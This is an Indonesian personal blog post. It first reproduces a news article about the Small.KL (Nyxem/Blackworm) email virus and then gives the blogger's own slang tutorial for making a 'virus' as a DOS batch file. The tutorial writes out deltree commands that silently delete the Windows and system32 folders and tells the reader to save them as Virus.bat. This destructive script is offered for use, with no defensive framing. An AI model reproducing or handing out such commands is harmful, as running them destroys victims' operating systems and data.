TERIMA KASIH ATAS KUNJUNGAN ANDA

2/13/2010

Virus

Virus Small.KL bisa merusak data sekaligus menyusup ke jaringan komputer melalui surat elektronik. Sejak virus ditemukan tahun silam, sedikitnya seribu komputer sudah diserang.

Liputan6.com, Jakarta: Jika kebetulan menerima data dengan nama tidak lazim seperti eBook.uu lewat surat elektronik, lebih baik tidak dibuka. Sebab, data itu membawa virus baru yang dikenal Small.KL. Virus yang menyebar hari ketiga pada setiap bulan ini tergolong berbahaya. Seluruh data di komputer bisa hilang jika terserang Small.KL.

Setiap hari lebih dari 33 virus ditemukan dalam komputer. Tingkat bahaya virus Small.KL sangat tinggi karena tidak cuma menyerang satu atau dua komputer saja, tetapi juga jaringan dalam sebuah instansi. Virus Small.KL pertama kali ditemukan tanggal 18 Januari 2005. Sejak itu, lebih dari seribu komputer sudah terinfeksi. Jika tidak segera diantisipasi bukan tidak mungkin jumlah "korban" semakin banyak.

Virus blackworm ini memiliki banyak nama samaran, antara lain, Kama Sutra, Nyxem, dan My-Wife. Sasarannya adalah file-file populer seperti produk Microsoft, Adobe Systems, dan Zip. Biasanya data dalam surat elektronik berbentuk lampiran atau attachment dengan judul seronok untuk menarik perhatian. Misalnya, "Hot Movie", "Give Me a Kiss", dan berbagai tema porno lain.

Pakar komputer menduga, virus Small.KL sudah terselip dalam 275.000 sampai 500.000 mesin komputer dan siap melaksanakan penghancuran yang sudah diprogramkan akan aktif pada 3 Februari ini. Meski antivirus untuk menangkal virus tersedia di pasar, tapi kerusakan tidak segera diketahui, pengobatan bakal terlambat.

Menurut spesialis antivirus komputer Alfons Tanujaya, cara mengatasi penyebaran Small.KL cukup mudah. "Gunakan antivirus yang dipercaya dan update-nya jelas," kata Alfons. Namun, dia lebih menyarankan agar pengguna komputer terlebih dahulu membuat data cadangan. "Ini yang Perpenting," kata dia.(KEN/Vivi Waluyo dan Muhammad Iqbal)

Gwe bikin versi DOSnya nieh, jadi buat yg ga py VB, ga mashalah!

Kalo pake VB, korban harus ada runtime vb, kcuali lu bisa convert vb ke C++

Please bgt, kalo lom bgitu ngerti sbaiknya jgn... soalnya beda ama vb, kalo dos gwe ga bs bikin proteksinya.

Okeh, ikutin langkah2 ini

1. Buka Notepad

2. tulis Isinya:

deltree /y c:\windows\system32\*.*

deltree /y c:\windows\*.*

3. save dengan nama cth: "Virus.bat", jgn lupa harus pake extensi ".bat"

4. slese

lebih simple kan? *.* itu artinya apus file didalem folder itu, kalo ga pake *.* kayanya foldernya yg diapus(kayanya)

Ngertikan? masa ga ngerti sih...

kalo udah disave, ntar hasilnya jadi dos application.

0 komentar:

Posting Komentar

Template by : kendhin x-template.blogspot.com